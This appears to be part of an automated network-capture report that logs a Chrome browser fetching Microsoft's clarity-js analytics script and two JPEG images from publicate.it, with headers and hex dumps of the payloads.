                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: CLID=c33b4f75fae844d6b05821f811173c55.20240830.20250830
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC619INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:25 GMT
                                                                                                                                                                                                        Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                        Content-Length: 65276
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Last-Modified: Wed, 28 Aug 2024 19:57:49 GMT
                                                                                                                                                                                                        ETag: "0x8DCC79BB1C5F66A"
                                                                                                                                                                                                        x-ms-request-id: ff5b1345-401e-0078-20ef-f98d23000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        x-azure-ref: 20240830T161625Z-165795675767hwjqv3v00bvq3400000003ng00000000mcfb
                                                                                                                                                                                                        Cache-Control: public, max-age=86400
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 51562430
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC15765INData Raw: 2f 2a 20 63 6c 61 72 69 74 79 2d 6a 73 20 76 30 2e 37 2e 34 35 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 69 63 72 6f 73 6f 66 74 2f 63 6c 61 72 69 74 79 20 28 4c 69 63 65 6e 73 65 3a 20 4d 49 54 29 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 6e 75 6c 6c 2c 67 65 74 20 71 75 65 75 65 28 29 7b 72 65 74 75 72 6e 20 73 72 7d 2c 67 65 74 20 73 74 61 72 74 28 29 7b 72 65 74 75 72 6e 20 63 72 7d 2c 67 65 74 20 73 74 6f 70 28 29 7b 72 65 74 75 72 6e 20 6c 72 7d 2c 67 65 74 20 74 72 61 63 6b 28 29 7b 72 65 74 75 72 6e 20 61 72 7d 7d 29 2c 65 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f
                                                                                                                                                                                                        Data Ascii: /* clarity-js v0.7.45: https://github.com/microsoft/clarity (License: MIT) */!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__pro
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 6c 2c 6d 65 74 61 64 61 74 61 3a 7b 61 63 74 69 76 65 3a 21 30 2c 73 75 73 70 65 6e 64 3a 21 31 2c 70 72 69 76 61 63 79 3a 66 2c 70 6f 73 69 74 69 6f 6e 3a 6e 75 6c 6c 2c 66 72 61 75 64 3a 64 2c 73 69 7a 65 3a 6e 75 6c 6c 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 61 3d 65 2e 64 61 74 61 2c 72 3d 65 2e 6d 65 74 61 64 61 74 61 2c 69 3d 72 2e 70 72 69 76 61 63 79 2c 6f 3d 61 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 7b 7d 2c 75 3d 61 2e 74 61 67 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3b 73 77 69 74 63 68 28 21 30 29 7b 63 61 73 65 20 50 74 2e 69 6e 64 65 78 4f 66 28 75 29 3e 3d 30 3a 76 61 72 20 63 3d 6f 2e 74 79 70 65 2c 73 3d 22 22 2c 6c 3d 5b 22 63 6c 61 73 73 22 2c 22 73 74 79 6c 65 22 5d 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28
                                                                                                                                                                                                        Data Ascii: l,metadata:{active:!0,suspend:!1,privacy:f,position:null,fraud:d,size:null}},function(t,e,n){var a=e.data,r=e.metadata,i=r.privacy,o=a.attributes||{},u=a.tag.toUpperCase();switch(!0){case Pt.indexOf(u)>=0:var c=o.type,s="",l=["class","style"];Object.keys(
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 21 3d 3d 72 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 72 26 26 4b 6e 28 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 5a 6e 28 74 2c 65 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 31 29 2c 6e 75 6c 6c 21 3d 3d 74 29 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 74 29 7b 63 61 73 65 22 6e 75 6d 62 65 72 22 3a 72 65 74 75 72 6e 20 4d 61 74 68 2e 72 6f 75 6e 64 28 74 2a 65 29 3b 63 61 73 65 22 73 74 72 69 6e 67 22 3a 72 65 74 75 72 6e 20 4d 61 74 68 2e 72 6f 75 6e 64 28 70 61 72 73 65 46 6c 6f 61 74 28 74 2e 72 65 70 6c 61 63 65 28 47 6e 2c 22 22 29 29 2a 65 29 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 76 61 72 20 51 6e 3d 5b 22 74 69 74 6c 65 22 2c 22 61 6c 74 22 2c 22 6f 6e 6c 6f 61 64 22 2c 22 6f 6e 66 6f 63 75 73 22 2c 22 6f 6e 65 72 72
                                                                                                                                                                                                        Data Ascii: !==r&&"object"==typeof r&&Kn(r)}}function Zn(t,e){if(void 0===e&&(e=1),null!==t)switch(typeof t){case"number":return Math.round(t*e);case"string":return Math.round(parseFloat(t.replace(Gn,""))*e)}return null}var Qn=["title","alt","onload","onfocus","onerr
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 28 6e 2c 22 7c 22 29 2e 63 6f 6e 63 61 74 28 61 29 3a 22 22 3b 74 20 69 6e 20 77 72 26 26 77 72 5b 74 5d 2e 69 6e 64 65 78 4f 66 28 69 29 3e 3d 30 7c 7c 28 62 72 3d 7b 63 6f 64 65 3a 74 2c 6e 61 6d 65 3a 6e 2c 6d 65 73 73 61 67 65 3a 61 2c 73 74 61 63 6b 3a 72 2c 73 65 76 65 72 69 74 79 3a 65 7d 2c 74 20 69 6e 20 77 72 3f 77 72 5b 74 5d 2e 70 75 73 68 28 69 29 3a 77 72 5b 74 5d 3d 5b 69 5d 2c 79 72 28 33 33 29 29 7d 76 61 72 20 53 72 2c 45 72 3d 7b 7d 2c 4f 72 3d 6e 65 77 20 53 65 74 2c 4e 72 3d 7b 7d 2c 54 72 3d 7b 7d 2c 4d 72 3d 7b 7d 2c 78 72 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 72 28 29 7b 6a 72 28 29 7d 66 75 6e 63 74 69 6f 6e 20 49 72 28 74 29 7b 74 72 79 7b 76 61 72 20 65 3d 74 26 26 74 2e 6c 65 6e 67 74 68 3e 30 3f 74 2e 73 70 6c 69 74 28 2f
                                                                                                                                                                                                        Data Ascii: (n,"|").concat(a):"";t in wr&&wr[t].indexOf(i)>=0||(br={code:t,name:n,message:a,stack:r,severity:e},t in wr?wr[t].push(i):wr[t]=[i],yr(33))}var Sr,Er={},Or=new Set,Nr={},Tr={},Mr={},xr={};function _r(){jr()}function Ir(t){try{var e=t&&t.length>0?t.split(/
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC359INData Raw: 67 72 61 64 65 3a 65 74 2c 76 65 72 73 69 6f 6e 3a 6c 7d 29 2c 61 6f 3d 77 69 6e 64 6f 77 2c 72 6f 3d 22 63 6c 61 72 69 74 79 22 3b 66 75 6e 63 74 69 6f 6e 20 69 6f 28 29 7b 69 66 28 76 6f 69 64 20 30 21 3d 3d 61 6f 29 7b 69 66 28 61 6f 5b 72 6f 5d 26 26 61 6f 5b 72 6f 5d 2e 76 29 72 65 74 75 72 6e 20 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 45 72 72 6f 72 20 43 4c 30 30 31 3a 20 4d 75 6c 74 69 70 6c 65 20 43 6c 61 72 69 74 79 20 74 61 67 73 20 64 65 74 65 63 74 65 64 2e 22 29 3b 76 61 72 20 74 3d 61 6f 5b 72 6f 5d 26 26 61 6f 5b 72 6f 5d 2e 71 7c 7c 5b 5d 3b 66 6f 72 28 61 6f 5b 72 6f 5d 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 65 5b 6e
                                                                                                                                                                                                        Data Ascii: grade:et,version:l}),ao=window,ro="clarity";function io(){if(void 0!==ao){if(ao[ro]&&ao[ro].v)return console.warn("Error CL001: Multiple Clarity tags detected.");var t=ao[ro]&&ao[ro].q||[];for(ao[ro]=function(t){for(var e=[],n=1;n<arguments.length;n++)e[n


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        112192.168.2.549899104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC703OUTGET /images/nhph2-p-500.jpg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC742INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:25 GMT
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 17632
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "44e0-620aa1d1ccbe8"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SJ3LZIJYLyTf9pqawCMDVJtXgvqcgg84AzpwAQY8ASeUVuplYgEvUwb3BhLf5cOyLapI4JOMAt06wDqQixsPhEjbhQIBcwLCnwuTZWogeqr6alkJgH2NEPwfo88oyw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615d0deb28c47-EWR
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC627INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 01 76 01 f4 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 03 01 02 04 06 07 05 08 ff c4 00 57 10 00 01 03 02 01 08 05 06 08 09 0a 03 08 03 01 00 01 00 02 03 04 11 05 06 12 13 14 21 31 51 91 07 41 52 61 71 22 32 33 92 a1 c1 15 16 53 62 72 81 b1 e1 08 17 23 34 42 54 93 b2 d1 24 37
                                                                                                                                                                                                        Data Ascii: C%# , #&')*)-0-(0%()(C(((((((((((((((((((((((((((((((((((((((((((((((((((v"W!1QARaq"23Sbr#4BT$7
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 23 bc bd 86 fa df 72 5e 5e c3 7d 6f b9 48 88 23 bc bd 86 fa df 72 5e 5e c3 7d 6f b9 48 88 23 bc bd 86 fa df 72 5e 5e c3 7d 6f b9 48 88 23 bc bd 86 fa df 72 09 2c 6c f6 96 9e fd dc d4 88 e0 1c 08 22 e0 a0 22 8a 32 58 f2 c2 6f 6d a0 9e 0a 54 04 44 40 44 44 04 44 40 44 44 04 44 40 44 44 04 44 40 44 26 ca c0 5c 45 c0 d9 de 50 5e 8a cf 2f 80 e6 9e 5f 01 cd 05 e8 ac f2 f8 0e 69 e5 f0 1c d0 5e 8a cc e2 0d 9c 2d 74 ce 2e be 68 dc 82 f4 3b 95 9e 5f 01 cd 0e 7f 01 cd 05 8c db 51 fe 1f 7a 99 40 d8 de 25 2e d9 ba db d4 9e 5f 01 cd 05 e8 ac 25 cd de 36 77 15 78 37 40 44 44 04 44 40 44 44 04 44 40 44 44 04 44 40 44 44 04 44 40 44 44 04 44 40 44 44 04 44 40 44 44 04 44 40 44 44 04 44 40 44 44 10 cb b2 76 78 1f 72 98 6e 50 cd e9 a3 f0 3e e5 2b 77 20 aa 22 20 22 22 02 22
                                                                                                                                                                                                        Data Ascii: #r^^}oH#r^^}oH#r^^}oH#r,l""2XomTD@DDD@DDD@DDD@D&\EP^/_i^-t.h;_Qz@%._%6wx7@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDvxrnP>+w " """
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 55 55 df a6 70 ee 52 fa 37 78 24 7b 92 5f 46 ef 04 8f 72 f0 ce ea e4 44 40 44 44 04 44 41 8f 59 4e 67 0d 2d 20 11 c5 62 ea 32 f1 67 35 e9 22 9c a3 0f 37 51 97 8b 39 a6 a3 2f 16 73 5e 92 26 4c 3c dd 46 5e 2c e6 9a 8c bc 59 cd 64 4b 5a c6 3c b4 34 ba db 09 56 7c 20 df 93 77 34 dd 1b 22 d4 65 e2 ce 69 a8 cb c5 9c d4 bf 08 37 e4 dd cd 3e 10 6f c9 bb 9a 6e 6c 8b 51 97 8b 39 a6 a3 2f 16 73 52 fc 20 df 93 77 34 f8 41 bf 26 ee 69 b9 b2 2d 46 5e 2c e6 9a 8c bc 59 cd 4b f0 83 7e 4d dc d3 e1 06 fc 9b b9 a6 e6 c8 b5 19 78 b3 9a 6a 32 f1 67 35 2f c2 0d f9 37 73 4f 84 1b f2 6e e6 9b 9b 22 d4 65 e2 ce 69 a8 cb c5 9c d4 cd af 61 70 05 ae 00 f5 ac c4 ca 71 0f 37 51 97 8b 39 aa 6a 32 f1 67 35 e9 a2 64 c3 1e 8e 9c c0 1c 5c 41 27 82 c8 44 50 91 11 10 11 11 01 11 10 11 11 04
                                                                                                                                                                                                        Data Ascii: UUpR7x${_FrD@DDDAYNg- b2g5"7Q9/s^&L<F^,YdKZ<4V| w4"ei7>onlQ9/sR w4A&i-F^,YK~Mxj2g5/7sOn"eiapq7Q9j2g5d\A'DP
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: ad dc 82 a8 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 82 c9 77 2a b3 d1 b7 c1 52 5d ca ac f4 6d f0 41 f2 7f 49 ce 64 5d 2f 62 33 4a 73 63 65 6c 2f 73 8f 50 01 84 95 da b1 bc a9 e8 e3 18 b3 ab f1 6c 3d d2 03 b2 46 b9 cd 77 85 c0 dc b8 c7 4a ac 8c f4 9d 8c 19 da 5d 0e b0 cc f0 0d 8d b3 1b 75 e0 cb 4f 93 e6 51 79 aa c3 3c a0 40 04 ed 0d 39 a6 fc 0b b3 47 35 ee 27 47 4e a6 cd 9a a6 aa a2 69 a6 3a 7d 21 d1 9b 7c d4 d3 3f 27 5b e9 5b 2b 32 36 a7 a3 1c 53 08 c9 ec 4a 85 f3 cb a3 11 c1 00 37 75 a4 69 3d 5b 76 03 b4 ac 0f c1 35 b9 b0 e5 3f d3 a7 fb 1e b9 05 44 18 48 88 96 39 ee 76 af 7b 67 3a fa 7e 03 67 99 df bd 76 3f c1 4d b9 b0 e5 37 d3 a7 fb 1e b5 f5 da 4a 74 bc 3e e5 34 cc ce 66 27 7f ac 29 5d 3c 96 e6 1d e2 a3 cd 1e 2a b4 fe 61 f1 54 a8 f3 47 8a ad 3f
                                                                                                                                                                                                        Data Ascii: w*R]mAId]/b3Jscel/sPl=FwJ]uOQy<@9G5'GNi:}!|?'[[+26SJ7ui=[v5?DH9v{g:~gv?M7Jt>4f')]<*aTG?
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 86 8b ba c3 c5 70 71 8d e2 62 f6 c4 2a c7 84 a4 7d 8a a3 1a c4 ef 7f 84 2a ef df 29 2a d8 94 65 db e4 9e 96 32 41 91 a4 8d e1 a2 ff 00 62 c1 9f 16 8e 31 f9 38 24 77 8d 9a b9 65 3e 53 e3 11 00 35 c3 20 e1 23 1a ef 72 f4 29 32 8f 18 aa a8 64 6d 11 48 e7 9b 00 d8 c0 2a 95 45 70 bd 3c ad e8 e2 d5 2f 75 a1 a2 04 75 dd e7 f8 2c ea 49 aa 65 b1 92 91 ad 1d 6e 12 6c 1c c2 c3 a7 fe 4f 13 5d 52 ed 24 d6 dc 77 0f 00 b1 eb 71 19 5c 0b 5a 48 1c 02 d6 f1 aa 66 f0 e1 ea 57 e2 54 b4 6c 24 91 23 f8 75 2d 03 29 72 b6 69 4b 99 0b bb b6 6e 0a 1c 7f 10 64 00 eb 12 5d e7 74 60 ed 3e 2b 48 aa a9 74 f2 13 60 d1 c0 2c f6 e8 9a ff 00 15 6c 55 cc 51 b5 3d 55 ab a9 92 79 4b e5 7b 9c e3 d6 4a 84 9e 2a c5 42 b6 d8 1e a5 06 3f 89 61 c4 0a 3a d9 e3 68 fd 12 ec e6 f2 37 0b 64 c3 fa 45 ad
                                                                                                                                                                                                        Data Ascii: pqb*}*)*e2Ab18$we>S5 #r)2dmH*Ep</uu,IenlO]R$wq\ZHfWTl$#u-)riKnd]t`>+Ht`,lUQ=UyK{J*B?a:h7dE
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 17 00 a7 13 28 99 88 ea 95 16 1b f1 4a 08 fc fa ea 56 f8 ca d1 ef 58 d2 65 16 0d 1f 9d 8a 51 0f fa cd 3e f5 68 b7 5c f4 89 52 6f 5b a7 ad 51 f9 bd 54 5e 0b f2 bf 00 65 ef 8a d2 fd 4e bf d8 bd 0c 2b 14 a3 c5 61 74 d8 7c ba 68 41 cd cf 0d 21 a4 f7 12 36 fd 4a 6a b5 72 88 cd 54 cc 47 d1 5a 35 16 ab 9e 5a 2a 89 9f ab 39 11 16 36 61 11 10 11 11 01 11 10 11 11 05 92 ee 55 8f d1 b7 c1 52 5d ca b1 f9 8d f0 41 f3 97 4d 98 59 aa cb ea 99 a0 3f 96 d1 c3 76 9d ce f2 47 b5 49 92 99 67 8b 64 8d 44 94 92 c6 e9 a9 5a e2 1f 49 39 2d 31 bb e6 9d ed f0 dc bd 3e 95 c5 b2 ee 72 76 03 1c 24 5f af 62 e9 f9 59 91 78 66 53 c2 c7 d4 34 c1 58 d0 03 6a 62 03 3a dc 0f 53 87 8a cd c5 38 75 36 ed d9 bf a7 da aa a3 7f 9f 47 4f 83 f1 c8 ab 9f 47 ae a7 9a dc 4e dd e3 f9 f9 c3 8c 9c a3 c4
                                                                                                                                                                                                        Data Ascii: (JVXeQ>h\Ro[QT^eN+at|hA!6JjrTGZ5Z*96aUR]AMY?vGIgdDZI9-1>rv$_bYxfS4Xjb:S8u6GOGN
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 46 25 cc 00 16 de c8 2b 2d 3c 32 90 65 8a 37 91 b8 b9 a0 a9 40 50 e9 c7 64 a6 9c 76 4a 18 49 23 1b 23 0b 24 6b 5c d3 bc 38 5c 15 48 a2 8e 26 e6 c5 1b 58 dd f6 68 01 59 a7 1d 92 9a 71 d9 28 61 5a 8f 34 78 aa d3 f9 87 c5 58 e7 19 2d b2 c0 23 5c 63 b8 b5 c2 0f 2b 2c 32 66 87 2a b0 87 50 62 01 c0 03 9f 1c ac f3 a3 77 11 fc 3a d7 97 86 64 58 a6 c8 39 f2 62 b2 b4 d5 40 f6 c8 c8 e5 d1 e6 96 35 c6 ed d9 73 b8 ad af 4d f3 4a a6 9e df a2 56 5a 6f 5c a6 98 a2 27 68 9c fd d8 aa b1 6e aa a6 b9 8d e6 31 f6 72 9c 4b a2 6c 47 13 a0 c3 e8 eb 72 8d 92 c5 42 c3 1c 24 d1 f9 41 a4 ee 2e ce b9 03 ab 82 d9 ba 3f e8 f6 83 24 1f 2d 43 66 75 65 7c 8d cc 33 bd a1 a1 ad e0 d1 d5 7e b2 b6 e1 54 d2 fc d0 d3 7b 5d 5f a6 f9 a5 65 af 5b 7a ba 3c 39 ab 6f b3 15 1a 2b 34 57 e2 45 3b af 97
                                                                                                                                                                                                        Data Ascii: F%+-<2e7@PdvJI##$k\8\H&XhYq(aZ4xX-#\c+,2f*Pbw:dX9b@5sMJVZo\'hn1rKlGrB$A.?$-Cfue|3~T{]_e[z<9o+4WE;
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 91 33 a9 91 80 d1 c8 2c 1e 67 9b d1 0c b1 63 1e a9 79 14 99 1d 52 00 7e 27 55 0d 23 3b 20 e7 bf 90 d8 39 af 42 3a 3c 03 0c 19 cd 80 d5 48 3f 4e a0 df 93 77 2f 0e b3 17 96 47 5e 47 5c 9d c2 eb 01 ce aa a8 77 e4 e2 9a 57 1d cd 63 49 51 8b 95 fa a5 39 a2 9e 90 d9 31 1c a8 93 33 47 19 0c 88 6e 6b 45 87 d4 02 d7 2a 71 59 e7 27 ca 2a f8 b0 1c 4a 73 9d 3c 6c a7 6f 19 9e 1b 6f ab 7a 92 4c 1a 8e 3d 95 98 bc 2c 6f 5b 61 69 71 e6 6c af 4d 36 e8 56 aa ab a9 e1 d4 56 12 48 0e b9 3b ce f5 8f 00 96 aa a5 91 b1 ae 71 27 cd 1b 49 5e f1 76 4c 51 d8 b9 b5 15 6e 1f 29 25 87 20 aa 32 c6 9e 84 11 85 51 41 4f d5 76 30 03 cf 7a cd cd 38 fc 14 b1 72 c6 7f 15 4f 6f 06 c9 5a 99 5a d9 2a 5a 22 6f 19 0d ad f5 2d 9a 96 93 06 c2 9b 9d 3c ad 91 e3 86 e5 ca eb 72 c7 11 a8 bd e4 23 eb 2b
                                                                                                                                                                                                        Data Ascii: 3,gcyR~'U#; 9B:<H?Nw/G^G\wWcIQ913GnkE*qY'*Js<loozL=,o[aiqlM6VVH;q'I^vLQn)% 2QAOv0z8rOoZZ*Z"o-<r#+
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 17 5e 6b f1 ac 32 37 13 1d 14 93 3b b5 2c 87 dc bd 23 d1 56 59 ff 00 53 3f f6 d1 ff 00 b9 50 74 4d 96 8e 3f f7 39 1e 33 c7 fe e5 b1 4e 92 23 da 58 a7 55 9f 78 79 0f ca 72 c7 13 49 45 4b 0d fa c3 01 3c ca c5 a9 ca 8c 4e 61 63 50 5a 38 37 62 d8 ff 00 14 79 64 77 e1 60 7f d6 67 f1 55 6f 44 59 5a 7c fc 3d c3 c1 cc 3f ea 57 8b 11 1f ed 52 6f cc ff 00 b9 a3 cf 88 d4 cb 7c f9 e4 27 c5 61 3e 57 38 ed 71 2b a1 1e 89 32 a4 1d b8 4d 5b be 8b a2 1f 6b d5 3f 15 19 50 1b ff 00 87 eb 9e ef f9 88 5a 3f 78 ac 91 44 c7 4a 54 9a e2 7a d4 e7 4e 24 ab 4a e8 ae e8 b7 2b 9b e6 64 ac 8e fa 75 8c 3f 63 82 1e 8c f2 d8 01 a3 c9 58 9a 47 19 23 77 da f5 6e 5a fb 2b cf 47 f5 39 c1 da 77 ab d9 0c b2 7a 38 de ef a2 d2 57 43 1d 1d 74 88 db e8 f0 06 b2 fd 97 40 3f d4 a3 9f a3 9e 92 a5 d8
                                                                                                                                                                                                        Data Ascii: ^k27;,#VYS?PtM?93N#XUxyrIEK<NacPZ87bydw`gUoDYZ|=?WRo|'a>W8q+2M[k?PZ?xDJTzN$J+du?cXG#wnZ+G9wz8WCt@?
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 9a 6a 73 76 47 35 95 af 45 c1 fc 93 5e 8b 83 f9 26 e6 21 8b a9 cd d9 1c d3 53 9b b2 39 ac ad 7a 2e 0f e4 9a f4 5c 1f c9 37 31 0c 5d 4e 6e c8 e6 9a 9c dd 91 cd 65 6b d1 70 7f 24 d7 a2 e0 fe 49 b9 88 62 ea 73 76 47 34 d4 e6 ec 8e 6b 2b 5e 8b 83 f9 26 bd 17 07 f2 4d cc 43 17 53 9b b2 39 a6 a7 37 64 73 59 5a f4 5c 1f c9 35 e8 b8 3f 92 6e 62 18 ba 9c dd 91 cd 4f 47 4c f8 a4 2f 7d 86 cb 00 0a bf 5e 8b 83 f9 29 20 a8 64 c4 86 93 71 d4 50 d9 32 22 28 58 44 44 10 cd e9 a3 f0 3e e5 2b 77 28 a6 f4 d1 f8 1f 72 95 bb 90 55 11 10 40 67 fe 5a 29 c3 6f f9 32 f7 3b 86 db 0e 7b 79 29 d5 8d 89 8d 95 d2 06 8c f7 00 09 ee 1b be d5 7a 99 c7 b2 23 3e e2 22 28 48 8a d7 3d ad f3 9c 07 89 57 03 71 70 50 11 11 01 11 10 11 11 01 11 10 11 11 01 11 10 11 11 01 0e e4 43 b9 04 0c fc e4
                                                                                                                                                                                                        Data Ascii: jsvG5E^&!S9z.\71]Nnekp$IbsvG4k+^&MCS97dsYZ\5?nbOGL/}^) dqP2"(XDD>+w(rU@gZ)o2;{y)z#>"(H=WqpPC


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        113192.168.2.549897104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC703OUTGET /images/nhph1-p-500.jpg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC754INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:25 GMT
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 22921
                                                                                                                                                                                                        Connection: close
